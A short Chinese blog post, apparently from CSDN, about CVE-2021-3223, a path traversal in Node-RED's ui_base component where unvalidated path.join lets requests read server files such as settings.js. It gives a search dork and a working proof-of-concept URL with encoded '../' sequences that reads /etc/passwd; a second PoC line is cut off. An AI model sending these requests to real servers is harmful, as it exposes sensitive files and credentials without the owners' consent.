Node-RED ui_base 任意文件读取漏洞 CVE-2021-3223

本文详细介绍了Node-RED中ui_base组件存在的任意文件读取漏洞(CVE-2021-3223),由于路径拼接时的安全疏漏,攻击者能遍历并读取服务器上的敏感文件,如settings.js。通过构造特定的URL请求,可以复现该漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞简介

Node-RED 在/nodes/ui_base.js中,URL与’/ui_base/js/*'匹配,然后传递给path.join,

缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js

漏洞复现

title=“Node-RED”

访问页面
在这里插入图片描述
验证poc


/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值